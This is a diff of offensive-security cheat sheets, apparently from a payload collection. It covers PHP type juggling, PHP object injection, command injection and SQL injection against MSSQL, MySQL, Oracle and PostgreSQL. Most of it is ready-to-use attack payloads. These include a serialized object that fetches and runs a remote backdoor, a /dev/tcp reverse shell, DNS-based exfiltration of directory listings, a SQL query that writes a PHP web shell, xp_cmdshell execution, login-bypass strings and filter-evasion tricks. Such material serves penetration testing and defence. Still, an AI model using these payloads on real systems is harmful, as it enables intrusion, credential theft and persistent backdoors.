||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
|
||||
* filedescriptor
|
||||
* https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
|
||||
* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
|
||||
* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
|
||||
|
@ -1,4 +1,4 @@
|
||||
# PHP Juggling type and magic hashes
|
||||
# PHP Juggling type and magic hashes
|
||||
|
||||
## Exploit
|
||||
|
||||
@ -14,13 +14,12 @@ var_dump('0xABCdef' == ' 0xABCdef');
|
||||
?>
|
||||
```
|
||||
|
||||
|
||||
| Hash | “Magic” Number / String | Magic Hash | Found By |
|
||||
| ---- | -------------------------- |:---------------------------------------------:| -------------:|
|
||||
| MD5 | 240610708 | 0e462097431906509019562988736854 | Michal Spacek |
|
||||
| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
|
||||
|
||||
|
||||
## Thanks to
|
||||
* http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html
|
||||
* https://www.whitehatsec.com/blog/magic-hashes/
|
||||
|
||||
* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
|
||||
* [Magic Hashes - WhieHatSec](https://www.whitehatsec.com/blog/magic-hashes/)
|
@ -1,8 +1,11 @@
|
||||
# PHP Object Injection
|
||||
PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
|
||||
|
||||
PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
|
||||
|
||||
## Exploit with the __wakeup in the unserialize function
|
||||
|
||||
Vulnerable code:
|
||||
|
||||
```php
|
||||
<?php
|
||||
class PHPObjectInjection{
|
||||
@ -17,7 +20,7 @@ Vulnerable code:
|
||||
}
|
||||
if(isset($_REQUEST['r'])){
|
||||
$var1=unserialize($_REQUEST['r']);
|
||||
if(is_array($var1)){
|
||||
if(is_array($var1)){
|
||||
echo "<br/>".$var1[0]." - ".$var1[1];
|
||||
}
|
||||
}
|
||||
@ -28,6 +31,7 @@ Vulnerable code:
|
||||
```
|
||||
|
||||
Payload:
|
||||
|
||||
```php
|
||||
# Basic serialized data
|
||||
a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
|
||||
@ -38,23 +42,26 @@ string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}
|
||||
```
|
||||
|
||||
## Others exploits
|
||||
|
||||
Reverse Shell
|
||||
|
||||
```php
|
||||
class PHPObjectInjection
|
||||
{
|
||||
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
|
||||
public $inject = "system('wget http://URL/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
|
||||
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
|
||||
public $inject = "system('wget http://URL/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
|
||||
}
|
||||
|
||||
echo urlencode(serialize(new PHPObjectInjection));
|
||||
```
|
||||
|
||||
Basic detection
|
||||
|
||||
```php
|
||||
class PHPObjectInjection
|
||||
{
|
||||
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
|
||||
public $inject = "system('cat /etc/passwd');";
|
||||
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
|
||||
public $inject = "system('cat /etc/passwd');";
|
||||
}
|
||||
|
||||
echo urlencode(serialize(new PHPObjectInjection));
|
||||
@ -63,5 +70,6 @@ echo urlencode(serialize(new PHPObjectInjection));
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
|
||||
* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
|
@ -1,10 +1,12 @@
|
||||
# Remote Commands Execution
|
||||
Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.
|
||||
|
||||
Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.
|
||||
NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
|
||||
|
||||
|
||||
## Exploits
|
||||
|
||||
Normal Commands execution, execute the command and voila :p
|
||||
|
||||
```powershell
|
||||
cat /etc/passwd
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
@ -14,6 +16,7 @@ sys:x:3:3:sys:/dev:/bin/sh
|
||||
```
|
||||
|
||||
Commands execution by chaining commands
|
||||
|
||||
```powershell
|
||||
original_cmd_by_server; ls
|
||||
original_cmd_by_server && ls
|
||||
@ -22,12 +25,14 @@ original_cmd_by_server || ls Only if the first cmd fail
|
||||
```
|
||||
|
||||
Commands execution inside a command
|
||||
|
||||
```powershell
|
||||
original_cmd_by_server `cat /etc/passwd`
|
||||
original_cmd_by_server $(cat /etc/passwd)
|
||||
```
|
||||
|
||||
Commands execution without space - Linux
|
||||
|
||||
```powershell
|
||||
swissky@crashlab:~/Www$ cat</etc/passwd
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
@ -52,50 +57,58 @@ swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
|
||||
```
|
||||
|
||||
Commands execution without space - Windows
|
||||
|
||||
```powershell
|
||||
ping%CommonProgramFiles:~10,-18%IP
|
||||
ping%PROGRAMFILES:~10,-5%IP
|
||||
```
|
||||
|
||||
|
||||
Commands execution without spaces, $ or { } - Linux (Bash only)
|
||||
|
||||
```powershell
|
||||
IFS=,;`cat<<<uname,-a`
|
||||
```
|
||||
|
||||
Commands execution with a line return
|
||||
|
||||
```powershell
|
||||
something%0Acat%20/etc/passwd
|
||||
```
|
||||
|
||||
Bypass blacklisted word with single quote
|
||||
|
||||
```powershell
|
||||
w'h'o'am'i
|
||||
```
|
||||
|
||||
Bypass blacklisted word with double quote
|
||||
|
||||
```powershell
|
||||
w"h"o"am"i
|
||||
```
|
||||
|
||||
Bypass blacklisted word with backslash
|
||||
|
||||
```powershell
|
||||
w\ho\am\i
|
||||
w\ho\am\i
|
||||
```
|
||||
|
||||
Bypass blacklisted word with $@
|
||||
|
||||
```powershell
|
||||
who$@ami
|
||||
```
|
||||
|
||||
Bypass blacklisted word with variable expansion
|
||||
|
||||
```powershell
|
||||
test=/ehhh/hmtc/pahhh/hmsswd
|
||||
test=/ehhh/hmtc/pahhh/hmsswd
|
||||
cat ${test//hhh\/hm/}
|
||||
cat ${test//hh??hm/}
|
||||
```
|
||||
|
||||
Bypass zsh/bash/sh blacklist
|
||||
|
||||
```powershell
|
||||
echo $0
|
||||
-> /usr/bin/zsh
|
||||
@ -103,37 +116,41 @@ echo whoami|$0
|
||||
```
|
||||
|
||||
## Challenge
|
||||
Challenge based on the previous tricks, what does the following command do:
|
||||
|
||||
Challenge based on the previous tricks, what does the following command do:
|
||||
|
||||
```powershell
|
||||
g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
|
||||
```
|
||||
|
||||
|
||||
## Time based data exfiltration
|
||||
|
||||
Extracting data : char by char
|
||||
|
||||
```powershell
|
||||
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
|
||||
real 0m5.007s
|
||||
user 0m0.000s
|
||||
sys 0m0.000s
|
||||
real 0m5.007s
|
||||
user 0m0.000s
|
||||
sys 0m0.000s
|
||||
|
||||
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
|
||||
real 0m0.002s
|
||||
user 0m0.000s
|
||||
sys 0m0.000s
|
||||
real 0m0.002s
|
||||
user 0m0.000s
|
||||
sys 0m0.000s
|
||||
```
|
||||
|
||||
|
||||
## DNS based data exfiltration
|
||||
Based on the tool from https://github.com/HoLyVieR/dnsbin also hosted at dnsbin.zhack.ca
|
||||
```
|
||||
|
||||
Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbin.zhack.ca
|
||||
|
||||
```powershell
|
||||
1. Go to http://dnsbin.zhack.ca/
|
||||
2. Execute a simple 'ls'
|
||||
for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
|
||||
* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
|
||||
* [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
|
||||
|
@ -1,22 +1,26 @@
|
||||
# MSSQL Injection
|
||||
|
||||
## MSSQL version
|
||||
|
||||
```sql
|
||||
SELECT @@version
|
||||
```
|
||||
|
||||
## MSSQL database name
|
||||
|
||||
```sql
|
||||
SELECT DB_NAME()
|
||||
```
|
||||
|
||||
## MSSQL List Databases
|
||||
|
||||
```sql
|
||||
SELECT name FROM master..sysdatabases;
|
||||
SELECT DB_NAME(N); — for N = 0, 1, 2, …
|
||||
```
|
||||
|
||||
## MSSQL List Column
|
||||
|
||||
```sql
|
||||
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
|
||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
|
||||
@ -25,6 +29,7 @@ SELECT table_catalog, column_name FROM information_schema.columns
|
||||
```
|
||||
|
||||
## MSSQL List Tables
|
||||
|
||||
```sql
|
||||
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
|
||||
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
|
||||
@ -33,8 +38,8 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master.
|
||||
SELECT table_catalog, table_name FROM information_schema.columns
|
||||
```
|
||||
|
||||
|
||||
## MSSQL User Password
|
||||
|
||||
```sql
|
||||
MSSQL 2000:
|
||||
SELECT name, password FROM master..sysxlogins
|
||||
@ -46,6 +51,7 @@ SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.
|
||||
```
|
||||
|
||||
## MSSQL Error based
|
||||
|
||||
```sql
|
||||
For integer inputs : convert(int,@@version)
|
||||
For integer inputs : cast((SELECT @@version) as int)
|
||||
@ -54,8 +60,8 @@ For string inputs : ' + convert(int,@@version) + '
|
||||
For string inputs : ' + cast((SELECT @@version) as int) + '
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Blind based
|
||||
|
||||
```sql
|
||||
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
|
||||
|
||||
@ -64,6 +70,7 @@ SELECT message FROM data WHERE row = 1 and message like 't%'
|
||||
```
|
||||
|
||||
## MSSQL Time based
|
||||
|
||||
```sql
|
||||
ProductID=1;waitfor delay '0:0:10'--
|
||||
ProductID=1);waitfor delay '0:0:10'--
|
||||
@ -75,18 +82,23 @@ IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' com
|
||||
```
|
||||
|
||||
## MSSQL Stacked Query
|
||||
|
||||
Use a semi-colon ";" to add another query
|
||||
|
||||
```sql
|
||||
ProductID=1; DROP members--
|
||||
```
|
||||
|
||||
## MSSQL Command execution
|
||||
|
||||
```sql
|
||||
EXEC xp_cmdshell "net user";
|
||||
EXEC xp_cmdshell "net user";
|
||||
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
|
||||
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'
|
||||
```
|
||||
|
||||
If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
|
||||
|
||||
```sql
|
||||
EXEC sp_configure 'show advanced options',1
|
||||
RECONFIGURE
|
||||
@ -95,11 +107,13 @@ RECONFIGURE
|
||||
```
|
||||
|
||||
## MSSQL Make user DBA (DB admin)
|
||||
|
||||
```sql
|
||||
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
|
||||
* [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
|
||||
|
||||
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
|
||||
* [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
|
||||
|
@ -1,6 +1,7 @@
|
||||
# MYSQL Injection
|
||||
|
||||
## MySQL Comment
|
||||
## MySQL
|
||||
|
||||
```sql
|
||||
# MYSQL Comment
|
||||
/* MYSQL Comment */
|
||||
@ -9,7 +10,9 @@
|
||||
```
|
||||
|
||||
## Detect columns number
|
||||
|
||||
Using a simple ORDER
|
||||
|
||||
```sql
|
||||
order by 1
|
||||
order by 2
|
||||
@ -19,6 +22,7 @@ order by XXX
|
||||
```
|
||||
|
||||
## MySQL Union Based
|
||||
|
||||
```sql
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
||||
@ -27,12 +31,14 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
||||
```
|
||||
|
||||
## MySQL Error Based - Basic
|
||||
|
||||
```sql
|
||||
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
||||
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
||||
```
|
||||
|
||||
## MYSQL Error Based - UpdateXML function
|
||||
|
||||
```sql
|
||||
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
|
||||
@ -42,12 +48,14 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) F
|
||||
```
|
||||
|
||||
Shorter to read:
|
||||
|
||||
```sql
|
||||
' and updatexml(null,concat(0x0a,version()),null)-- -
|
||||
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
|
||||
```
|
||||
|
||||
## MYSQL Error Based - Extractvalue function
|
||||
|
||||
```sql
|
||||
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
||||
@ -57,7 +65,9 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)
|
||||
```
|
||||
|
||||
## MYSQL Blind using a conditional statement
|
||||
|
||||
TRUE: `if @@version starts with a 5`:
|
||||
|
||||
```sql
|
||||
2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
||||
Response:
|
||||
@ -65,6 +75,7 @@ HTTP/1.1 500 Internal Server Error
|
||||
```
|
||||
|
||||
False: `if @@version starts with a 4`:
|
||||
|
||||
```sql
|
||||
2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
|
||||
Response:
|
||||
@ -72,6 +83,7 @@ HTTP/1.1 200 OK
|
||||
```
|
||||
|
||||
## MYSQL Blind with MAKE_SET
|
||||
|
||||
```sql
|
||||
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
||||
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
||||
@ -80,29 +92,32 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
||||
```
|
||||
|
||||
## MYSQL Time Based
|
||||
|
||||
```sql
|
||||
+BENCHMARK(40000000,SHA1(1337))+
|
||||
'%2Bbenchmark(3200,SHA1(1))%2B'
|
||||
' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
||||
|
||||
AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1
|
||||
RLIKE SLEEP([SLEEPTIME])
|
||||
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
|
||||
RLIKE SLEEP([SLEEPTIME])
|
||||
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
|
||||
```
|
||||
|
||||
|
||||
## MYSQL Read content of a file
|
||||
|
||||
```sql
|
||||
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
||||
```
|
||||
|
||||
## MySQL DIOS - Dump in One Shot
|
||||
|
||||
```sql
|
||||
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
||||
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
||||
```
|
||||
|
||||
## MYSQL DROP SHELL
|
||||
|
||||
```sql
|
||||
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
|
||||
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
|
||||
|
@ -1,11 +1,13 @@
|
||||
# Oracle SQL Injection
|
||||
|
||||
## Oracle SQL version
|
||||
|
||||
```sql
|
||||
SELECT user FROM dual UNION SELECT * FROM v$version
|
||||
```
|
||||
|
||||
## Oracle SQL database name
|
||||
|
||||
```sql
|
||||
SELECT global_name FROM global_name;
|
||||
SELECT name FROM V$DATABASE;
|
||||
@ -14,17 +16,20 @@ SELECT SYS.DATABASE_NAME FROM DUAL;
|
||||
```
|
||||
|
||||
## Oracle SQL List Databases
|
||||
|
||||
```sql
|
||||
SELECT DISTINCT owner FROM all_tables;
|
||||
```
|
||||
|
||||
## Oracle SQL List Column
|
||||
|
||||
```sql
|
||||
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
|
||||
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
|
||||
```
|
||||
|
||||
## Oracle SQL List Tables
|
||||
|
||||
```sql
|
||||
SELECT table_name FROM all_tables;
|
||||
SELECT owner, table_name FROM all_tables;
|
||||
@ -39,8 +44,7 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
|
||||
| CTXSYS.DRITHSX.SN | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual |
|
||||
| Invalid XPath | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual |
|
||||
| Invalid XML | SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual |
|
||||
| Invalid XML | SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users |
|
||||
|
||||
| Invalid XML | SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users |
|
||||
|
||||
## Oracle SQL Blind
|
||||
|
||||
@ -53,11 +57,13 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
|
||||
| First letter of first message is t | SELEC message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |
|
||||
|
||||
## Oracle SQL Time based
|
||||
|
||||
```sql
|
||||
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/
|
||||
```
|
||||
|
||||
## Oracle SQL Command execution
|
||||
|
||||
```sql
|
||||
/* create Java class */
|
||||
BEGIN
|
||||
@ -73,6 +79,7 @@ END;
|
||||
/* run OS command */
|
||||
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
|
||||
```
|
||||
|
||||
or (hex encoded)
|
||||
|
||||
```sql
|
||||
@ -85,4 +92,5 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* [Heavily taken inspired by - NetSpi SQL Wiki ](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
|
||||
|
||||
* [Heavily taken inspired by - NetSpi SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
|
||||
|
@ -1,13 +1,15 @@
|
||||
# POSTGRESQL
|
||||
|
||||
## PostgreSQL Comments
|
||||
```
|
||||
|
||||
```sql
|
||||
--
|
||||
/**/
|
||||
```
|
||||
|
||||
## PostgreSQL Error Based - Basic
|
||||
```
|
||||
|
||||
```sql
|
||||
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
|
||||
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
@ -15,7 +17,8 @@
|
||||
```
|
||||
|
||||
## PostgreSQL Time Based
|
||||
```
|
||||
|
||||
```sql
|
||||
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
|
||||
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
|
||||
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
|
||||
```
|
@ -1,7 +1,9 @@
|
||||
# SQL injection
|
||||
|
||||
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
||||
|
||||
## Summary
|
||||
|
||||
* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MSSQL%20Injection.md)
|
||||
* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)
|
||||
* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md)
|
||||
@ -16,10 +18,11 @@ A SQL injection attack consists of insertion or "injection" of a SQL query via t
|
||||
* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
|
||||
* [WAF Bypass](#waf-bypass)
|
||||
|
||||
|
||||
## Entry point detection
|
||||
|
||||
Detection of an SQL injection entry point
|
||||
Simple characters
|
||||
|
||||
```sql
|
||||
'
|
||||
%27
|
||||
@ -34,12 +37,14 @@ Wildcard (*)
|
||||
```
|
||||
|
||||
Multiple encoding
|
||||
|
||||
```sql
|
||||
%%2727
|
||||
%25%27
|
||||
```
|
||||
|
||||
Merging characters
|
||||
|
||||
```sql
|
||||
`+HERP
|
||||
'||'DERP
|
||||
@ -50,7 +55,8 @@ Merging characters
|
||||
```
|
||||
|
||||
Logic Testing
|
||||
```
|
||||
|
||||
```sql
|
||||
page.asp?id=1 or 1=1 -- true
|
||||
page.asp?id=1' or 1=1 -- true
|
||||
page.asp?id=1" or 1=1 -- true
|
||||
@ -58,7 +64,8 @@ page.asp?id=1 and 1=2 -- false
|
||||
```
|
||||
|
||||
Weird characters
|
||||
```
|
||||
|
||||
```sql
|
||||
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
|
||||
transformed into U+0022 QUOTATION MARK (")
|
||||
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
|
||||
@ -66,6 +73,7 @@ transformed into U+0027 APOSTROPHE (')
|
||||
```
|
||||
|
||||
## DBMS Identification
|
||||
|
||||
```c
|
||||
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
|
||||
["connection_id()=connection_id()" ,"MYSQL"],
|
||||
@ -94,27 +102,31 @@ transformed into U+0027 APOSTROPHE (')
|
||||
["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
|
||||
```
|
||||
|
||||
|
||||
## SQL injection using SQLmap
|
||||
|
||||
Basic arguments for SQLmap
|
||||
```
|
||||
|
||||
```powershell
|
||||
sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
|
||||
```
|
||||
|
||||
Custom injection in UserAgent/Header/Referer/Cookie
|
||||
```
|
||||
|
||||
```powershell
|
||||
python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" --headers="x-forwarded-for:127.0.0.1*"
|
||||
The injection is located at the '*'
|
||||
```
|
||||
|
||||
Second order injection
|
||||
```
|
||||
|
||||
```powershell
|
||||
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
|
||||
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
|
||||
```
|
||||
|
||||
Shell
|
||||
```
|
||||
|
||||
```powershell
|
||||
SQL Shell
|
||||
python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell
|
||||
|
||||
@ -126,12 +138,14 @@ python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
|
||||
```
|
||||
|
||||
Using suffix to tamper the injection
|
||||
```
|
||||
|
||||
```powershell
|
||||
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
|
||||
```
|
||||
|
||||
General tamper option and tamper's list
|
||||
```
|
||||
|
||||
```powershell
|
||||
tamper=name_of_the_tamper
|
||||
```
|
||||
|
||||
@ -184,6 +198,7 @@ tamper=name_of_the_tamper
|
||||
|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
|
||||
|
||||
## Authentication bypass
|
||||
|
||||
```sql
|
||||
'-'
|
||||
' '
|
||||
@ -277,19 +292,22 @@ admin") or "1"="1"/*
|
||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
```
|
||||
|
||||
|
||||
## Polyglot injection (multicontext)
|
||||
|
||||
```sql
|
||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||
```
|
||||
|
||||
## Second order injection
|
||||
## Routed injection
|
||||
|
||||
```sql
|
||||
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
|
||||
```
|
||||
|
||||
## Insert Statement - ON DUPLICATE KEY UPDATE
|
||||
|
||||
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
|
||||
|
||||
```sql
|
||||
Inject using payload:
|
||||
attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
|
||||
@ -303,10 +321,10 @@ Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL
|
||||
After this, we can simply authenticate with “admin@example.com” and the password “qwerty”!
|
||||
```
|
||||
|
||||
|
||||
## WAF Bypass
|
||||
|
||||
No Space (%20) - bypass using whitespace alternatives
|
||||
|
||||
```sql
|
||||
?id=1%09and%091=1%09--
|
||||
?id=1%0Dand%0D1=1%0D--
|
||||
@ -317,16 +335,19 @@ No Space (%20) - bypass using whitespace alternatives
|
||||
```
|
||||
|
||||
No Whitespace - bypass using comments
|
||||
|
||||
```sql
|
||||
?id=1/*comment*/and/**/1=1/**/--
|
||||
```
|
||||
|
||||
No Whitespace - bypass using parenthesis
|
